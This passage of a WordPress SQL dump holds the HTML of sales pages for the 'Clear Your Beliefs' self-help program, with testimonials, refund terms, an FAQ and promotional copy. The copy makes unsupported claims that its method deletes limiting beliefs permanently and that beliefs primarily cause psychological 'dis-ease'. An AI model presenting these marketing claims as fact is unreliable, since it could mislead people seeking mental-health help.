style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\r\n<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\r\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</em></strong> – Audio interview featuring Anodea Judith, Ph.D.\r\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\r\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\r\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\r\n<strong>=&gt; <em>A complete set of PDF Transcripts</em></strong> of all seven classes plus two bonus calls.\r\n<div class="clear"></div>\r\n&nbsp;\r\n<div class="cb inside">\r\n\r\n&nbsp;\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank" rel="noopener"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank" rel="noopener"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know anytime during the program, and we''ll happily issue you a pro-rated refund. You can keep the bonuses as our gift to you.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The Clear Beliefs Process</em></strong>®, and author of "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life."</em>\r\n\r\nHe is the co-author, with Anodea Judith, of "<em>Creating On Purpose: The Spiritual Technology of Manifesting."</em>  With his partner, Carista Luminare, Ph.D., he has created programs for couples and singles who want to create a more secure and passionate relationship.\r\n\r\nLion has more than 35 years experience in transformational coaching.  He coaches executives, teachers, business professionals, entrepreneurs, and other coaches, as well as high-acheiving individuals who are 100% committed to changing their lives for the better.\r\n\r\nHe also has extensive experience in entrepreneurial businesses, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Praise for Lion and Clear Your Beliefs</h1>\r\n<div class="quot">\r\n\r\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\r\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\r\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\r\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\r\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\r\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\r\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\r\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\r\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\r\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\r\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\r\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\r\n<div style="text-align: right;"></div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div class="cb inside">\r\n\r\n&nbsp;\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank" rel="noopener"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank" rel="noopener"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<div class="parg-text">\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nA: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><span style="color: #2e2efe;">info@clearyourbeliefs.com</span></a>, with a description of your circumstances and your offer of what you can pay.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><span style="color: #2e2efe;">support@clearyourbeliefs.com</span></a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><span style="color: #2e2efe;">support@clearyourbeliefs.com</span></a>. We''ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" rel="noopener"><span style="color: #2e2efe;">ClearYourBeliefs.com</span></a>, <a href="http://www.BeliefCloset.com" target="_blank" rel="noopener"><span style="color: #2e2efe;">BeliefCloset.com</span></a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" rel="noopener"><span style="color: #2e2efe;">ConfusedAboutLove.com.</span></a>\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n</div>\r\n<script>// <![CDATA[ jQuery(document).ready(function() { var is_chrome = window.chrome; if (is_chrome) { jQuery(''h5.hdr'').css(''text-size'', ''51px!important''); jQuery(''h5.hdr'').animate({ fontSize: ''51px'' }, 100); } }); jQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});}); // ]]>\r\n</script>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>', 'Clear Your Beliefs Program', '', 'publish', 'closed', 'closed', '', 'program', '', '', '2018-03-08 23:11:45', '2018-03-09 04:11:45', '', 0, 'http://clearyourbeliefs.com/?page_id=1941', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3149, 135, '2017-08-25 13:35:45', '2017-08-25 18:35:45', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n<h2>How and Why It Works So Well</h2>\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n&nbsp;\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank" rel="noopener">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n\n<h1>OKAY, I''M CONVINCED!\nTAKE ME TO THE PROGRAM DESCRIPTION,\nTELL ME ABOUT ALL THE COOL BONUSES I''LL GET,\nAND HOW MUCH IT COSTS</h1>\n\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Program Description</a></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\nThe best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" />\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.\n\n<strong>We literally create our reality with our beliefs.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\nA shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\nChange the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It''s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n&nbsp;\n\n"Sudden Reaction Syndrome" can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again.\n\n<strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\nYou''re no longer held back by old beliefs and stories.\n\nThere''s no resistance to doing what needs to be done.\n\nYou feel joy and positive energy as you move forward to create the life of your dreams.\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, 